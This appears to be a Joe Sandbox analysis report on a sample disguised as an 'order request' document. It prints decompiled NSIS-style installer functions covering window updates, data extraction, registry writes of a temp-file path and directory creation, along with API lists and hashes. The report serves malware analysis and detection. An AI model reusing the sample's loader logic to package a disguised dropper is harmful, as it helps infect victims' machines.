Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 1d16e4b4e9071ee1365a26ee0af684b72516ff45d02c382df6d476000192f948
Instruction ID: ba8ec8e77c4dae38fecb7239611b9da649e1c788ef9a4e56db7abbfefa36dde0
Opcode Fuzzy Hash: 1d16e4b4e9071ee1365a26ee0af684b72516ff45d02c382df6d476000192f948
Instruction Fuzzy Hash: A1512874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72D0DBB999429B69

Uniqueness

Uniqueness Score: -1.00%

Function 00405191 Relevance: 10.6, APIs: 7, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405191(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x7a7a24; // 0x10442
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x7a8af4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E00406054(_t38, 0, 0x7a0f20, 0x7a0f20, _a4);
					}
					_t27 = lstrlenW(0x7a0f20);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x7a7a08, 0x7a0f20); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x7a0f20;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x7a0f20[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x7a0f20, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x00405197
0x004051a1
0x004051a6
0x004051ac
0x004051b7
0x004051ba
0x004051bd
0x004051c3
0x004051c3
0x004051c9
0x004051d1
0x004051d4
0x004051f1
0x004051f5
0x004051fe
0x004051fe
0x00405208
0x00405211
0x0040521d
0x00405224
0x00405228
0x0040522b
0x0040523e
0x0040524c
0x0040524c
0x00405250
0x00405252
0x00405255
0x00000000
0x00405255
0x004051d6
0x004051de
0x004051e6
0x004051ec
0x00000000
0x004051ec
0x004051e6
0x004051d4
0x00405261

APIs

lstrlenW.KERNEL32(007A0F20,00000000,007924F8,762E23A0,?,?,?,?,?,?,?,?,?,00403168,00000000,?), ref: 004051C9
lstrlenW.KERNEL32(00403168,007A0F20,00000000,007924F8,762E23A0,?,?,?,?,?,?,?,?,?,00403168,00000000), ref: 004051D9
lstrcatW.KERNEL32(007A0F20,00403168), ref: 004051EC
SetWindowTextW.USER32(007A0F20,007A0F20), ref: 004051FE
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405224
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523E
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524C

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 1195aa0cb1608473c7f4939b13196918cf4c2ab7f0875985e493b2af82bd967e
Instruction ID: 239aa3d806fe655a10670de66778763bf8aa2df942fa5917c93f0fd796d6fb5a
Opcode Fuzzy Hash: 1195aa0cb1608473c7f4939b13196918cf4c2ab7f0875985e493b2af82bd967e
Instruction Fuzzy Hash: 6E21A171900518BACF119FA5DD849CFBFB9EF85354F10806AF904B6291D7794A50CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401D56 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E00401D56() {
				void* __esi;
				int _t7;
				signed char _t13;
				struct HFONT__* _t16;
				void* _t20;
				struct HDC__* _t26;
				void* _t28;
				void* _t30;

				_t26 = GetDC( *(_t30 - 0xc));
				_t7 = GetDeviceCaps(_t26, 0x5a);
				0x40cdd0->lfHeight =  ~(MulDiv(E00402BA2(2), _t7, 0x48));
				ReleaseDC( *(_t30 - 0xc), _t26);
				 *0x40cde0 = E00402BA2(3);
				_t13 =  *((intOrPtr*)(_t30 - 0x1c));
				 *0x40cde7 = 1;
				 *0x40cde4 = _t13 & 0x00000001;
				 *0x40cde5 = _t13 & 0x00000002;
				 *0x40cde6 = _t13 & 0x00000004;
				E00406054(_t20, _t26, _t28, "Tahoma",  *((intOrPtr*)(_t30 - 0x28)));
				_t16 = CreateFontIndirectW(0x40cdd0); // executed
				_push(_t16);
				_push(_t28);
				E00405F79();
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x00401d5f
0x00401d66
0x00401d81
0x00401d86
0x00401d93
0x00401d98
0x00401da3
0x00401daa
0x00401dbc
0x00401dc2
0x00401dc7
0x00401dd1
0x00402531
0x00401565
0x004029f2
0x00402a4f
0x00402a5b

APIs

GetDC.USER32(?), ref: 00401D59
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
ReleaseDC.USER32(?,00000000), ref: 00401D86
CreateFontIndirectW.GDI32(0040CDD0), ref: 00401DD1

Strings

Tahoma, xrefs: 00401DB7

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Tahoma
API String ID: 3808545654-3580928618
Opcode ID: 500d07c7ab604488b997273f6a95938f3c1fb7337d52538531d648fcc8621206
Instruction ID: 622cf3373c7b4650c41a942921d5e593d98aece64efbd6d354285906af2a4305
Opcode Fuzzy Hash: 500d07c7ab604488b997273f6a95938f3c1fb7337d52538531d648fcc8621206
Instruction Fuzzy Hash: 09014F31944640EFE701ABB0AF4ABDA3F74AB66305F104579E641B61E2DA7800059B2D

Uniqueness

Uniqueness Score: -1.00%

Function 00403027 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00403027(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				short _v152;
				void* _t65;
				long _t70;
				intOrPtr _t74;
				long _t75;
				intOrPtr _t76;
				void* _t77;
				int _t87;
				intOrPtr _t91;
				intOrPtr _t94;
				long _t95;
				signed int _t96;
				int _t97;
				int _t98;
				intOrPtr _t99;
				void* _t100;
				void* _t101;

				_t96 = _a16;
				_t91 = _a12;
				_v12 = _t96;
				if(_t91 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t91;
				if(_t91 == 0) {
					_v16 = 0x78f6f8;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E00403235( *0x7a8a98 + _t62);
				}
				if(E0040321F( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t91 != 0) {
							if(_a16 < _t96) {
								_t96 = _a16;
							}
							if(E0040321F(_t91, _t96) != 0) {
								_v8 = _t96;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t91) {
							goto L44;
						}
						_t87 = _v12;
						while(1) {
							_t97 = _a16;
							if(_a16 >= _t87) {
								_t97 = _t87;
							}
							if(E0040321F(0x78b6f8, _t97) == 0) {
								goto L41;
							}
							if(E00405CB9(_a8, 0x78b6f8, _t97) == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t97;
							_a16 = _a16 - _t97;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40ce58 =  *0x40ce58 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40ce40 = 0xb;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t98 = 0x4000;
						if(_a16 < 0x4000) {
							_t98 = _a16;
						}
						if(E0040321F(0x78b6f8, _t98) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t98;
						 *0x40ce30 = 0x78b6f8;
						 *0x40ce34 = _t98;
						while(1) {
							_t94 = _v16;
							 *0x40ce38 = _t94;
							 *0x40ce3c = _v12;
							_t74 = E00406527(0x40ce30);
							_v24 = _t74;
							if(_t74 < 0) {
								break;
							}
							_t99 =  *0x40ce38; // 0x7924f8
							_t100 = _t99 - _t94;
							_t75 = GetTickCount();
							_t95 = _t75;
							if(( *0x7a8af4 & 0x00000001) != 0 && (_t75 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t101 = _t101 + 0xc;
								E00405191(0,  &_v152);
								_v20 = _t95;
							}
							if(_t100 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t76 =  *0x40ce38; // 0x7924f8
									_v8 = _v8 + _t100;
									_v12 = _v12 - _t100;
									_v16 = _t76;
									L23:
									if(_v24 != 4) {
										continue;
									}
									goto L44;
								}
								_t77 = E00405CB9(_a8, _v16, _t100); // executed
								if(_t77 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t100;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

0x00403032
0x00403036
0x00403039
0x0040303e
0x00403040
0x00403040
0x00403047
0x0040304b
0x00403050
0x00403052
0x00403052
0x00403059
0x0040305e
0x00403069
0x00403069
0x0040307b
0x0040320d
0x0040320d
0x00000000
0x00403081
0x00403085
0x004031ba
0x004031fd
0x004031ff
0x004031ff
0x0040320b
0x00403212
0x00403215
0x00000000
0x00000000
0x00000000
0x00000000
0x0040320b
0x004031bf
0x00000000
0x00000000
0x004031c1
0x004031c4
0x004031c7
0x004031ca
0x004031cc
0x004031cc
0x004031dc
0x00000000
0x00000000
0x004031ea
0x004031b4
0x004031b4
0x0040320f
0x0040320f
0x00000000
0x0040320f
0x004031ec
0x004031ef
0x004031f6
0x00000000
0x00000000
0x00000000
0x004031f8
0x00000000
0x004031c4
0x00403091
0x00403093
0x0040309a
0x0040309a
0x004030a1
0x004030a7
0x004030ae
0x004030b1
0x00000000
0x00000000
0x00000000
0x00000000
0x004030b7
0x004030b7
0x004030b7
0x004030bf
0x004030c1
0x004030c1
0x004030d2
0x00000000
0x00000000
0x004030d8
0x004030db
0x004030e1
0x004030e7
0x004030e7
0x004030f2
0x004030f8
0x004030fd
0x00403104
0x00403107
0x00000000
0x00000000
0x0040310d
0x00403113
0x00403115
0x0040311e
0x00403120
0x00403151
0x00403157
0x00403163
0x00403168
0x00403168
0x0040316d
0x004031a8
0x00000000
0x00000000
0x00000000
0x0040316f
0x00403173
0x0040318a
0x0040318f
0x00403192
0x00403195
0x00403198
0x0040319c
0x00000000
0x00000000
0x00000000
0x004031a2
0x0040317c
0x00403183
0x00000000
0x00000000
0x00403185
0x00000000
0x00403185
0x0040316d
0x004031b0
0x00000000
0x004031b0
0x00000000
0x004030b7

APIs

GetTickCount.KERNEL32 ref: 00403091
GetTickCount.KERNEL32 ref: 00403115
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 0040313E
wsprintfW.USER32 ref: 00403151

Strings

... %d%%, xrefs: 0040314B

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: f3ce815b3ce23d87c6a937b6e6d87f9e0afd4b1277b2b64b34a5536ec2ef900c
Instruction ID: c5c4fbc020d382a06f3b5c516385cf2f0b989405556926c34d029951a3a1b574
Opcode Fuzzy Hash: f3ce815b3ce23d87c6a937b6e6d87f9e0afd4b1277b2b64b34a5536ec2ef900c
Instruction Fuzzy Hash: EC519B31801209EBCB10CFA5DA44B9F7BB8AF55726F1441BBE914B72C1C7789E008BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040237B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E0040237B(void* __eax) {
				void* _t17;
				short* _t20;
				int _t21;
				long _t24;
				char _t26;
				int _t29;
				intOrPtr _t37;
				void* _t39;

				_t17 = E00402CB4(__eax);
				_t37 =  *((intOrPtr*)(_t39 - 0x1c));
				 *(_t39 - 0x34) =  *(_t39 - 0x18);
				 *(_t39 - 8) = E00402BBF(2);
				_t20 = E00402BBF(0x11);
				 *(_t39 - 4) = 1;
				_t21 = RegCreateKeyExW(_t17, _t20, _t29, _t29, _t29,  *0x7a8af0 | 0x00000002, _t29, _t39 + 8, _t29); // executed
				if(_t21 == 0) {
					if(_t37 == 1) {
						E00402BBF(0x23);
						_t21 = lstrlenW(0x40b5c8) + _t28 + 2;
					}
					if(_t37 == 4) {
						_t26 = E00402BA2(3);
						 *0x40b5c8 = _t26;
						_t21 = _t37;
					}
					if(_t37 == 3) {
						_t21 = E00403027( *((intOrPtr*)(_t39 - 0x20)), _t29, 0x40b5c8, 0x1800); // executed
					}
					_t24 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 8), _t29,  *(_t39 - 0x34), 0x40b5c8, _t21); // executed
					if(_t24 == 0) {
						 *(_t39 - 4) = _t29;
					}
					_push( *(_t39 + 8));
					RegCloseKey();
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *(_t39 - 4);
				return 0;
			}

0x0040237c
0x00402381
0x0040238b
0x00402395
0x00402398
0x004023b2
0x004023b9
0x004023c1
0x004023cf
0x004023d3
0x004023de
0x004023de
0x004023e5
0x004023e9
0x004023ef
0x004023f4
0x004023f4
0x004023f8
0x00402404
0x00402404
0x00402415
0x0040241d
0x0040241f
0x0040241f
0x00402422
0x004024f6
0x004024f6
0x00402a4f
0x00402a5b

APIs

RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nspD224.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nspD224.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nspD224.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Strings

C:\Users\user\AppData\Local\Temp\nspD224.tmp, xrefs: 004023CA, 004023D8, 004023EF, 004023FF, 0040240A

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nspD224.tmp
API String ID: 1356686001-89864070
Opcode ID: c8d2024ca6914caa20ff415175f9df726a7bf297326ec571d110e4b150377c25
Instruction ID: eb15040666a4b84098e37ffbf96cc219ad532b268eb93921d51e5d7316b4335f
Opcode Fuzzy Hash: c8d2024ca6914caa20ff415175f9df726a7bf297326ec571d110e4b150377c25
Instruction Fuzzy Hash: 9B119D71A00108BEEB11AFA4DE89DAE76BDEB44358F11403AF904B21D1DAB89E409668

Uniqueness

Uniqueness Score: -1.00%

Function 00405660 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405660(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083b0;
				_v36.Group = 0x4083b0;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083a0;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x0040566b
0x0040566f
0x00405672
0x00405678
0x0040567c
0x00405680
0x00405688
0x0040568f
0x00405695
0x0040569c
0x004056a3
0x004056ab
0x004056ad
0x00000000
0x004056ad
0x004056b7
0x004056be
0x004056d4
0x00000000
0x00000000
0x00000000
0x004056d6
0x004056da

APIs

CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056A3
GetLastError.KERNEL32 ref: 004056B7
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056CC
GetLastError.KERNEL32 ref: 004056D6

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405686

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-3355392842
Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
Instruction ID: a656050947ebfef5167fdf4c2b21dc35e266e59b00d64b4b83911e60c27c7584
Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
Instruction Fuzzy Hash: 94010871D00619EBEF019FA0C9087EFBBB8EB14314F10443AD549B6280E77996148FA9

Uniqueness

Uniqueness Score: -1.00%

Function 00402BFF Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00402BFF(void* _a4, short* _a8, intOrPtr _a12) {
				void* _v8;
				short _v532;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExW(_a4, _a8, 0,  *0x7a8af0 | 0x00000008,  &_v8); // executed
				if(_t18 == 0) {
					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402BFF(_v8,  &_v532, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00406408(3);
					if(_t27 == 0) {
						if( *0x7a8af0 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyW(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x7a8af0, 0);
				}
				return _t18;
			}

0x00402c20
0x00402c28
0x00402c50
0x00402c3a
0x00402c8a
0x00402c90
0x00000000
0x00402c92
0x00402c4e
0x00000000
0x00000000
0x00402c4e
0x00402c65
0x00402c6d
0x00402c74
0x00402ca0
0x00000000
0x00000000
0x00402ca8
0x00402cb0
0x00000000
0x00000000
0x00000000
0x00402cb0
0x00000000
0x00402c83
0x00402c97

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
RegCloseKey.ADVAPI32(?), ref: 00402C65
RegCloseKey.ADVAPI32(?), ref: 00402C8A
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
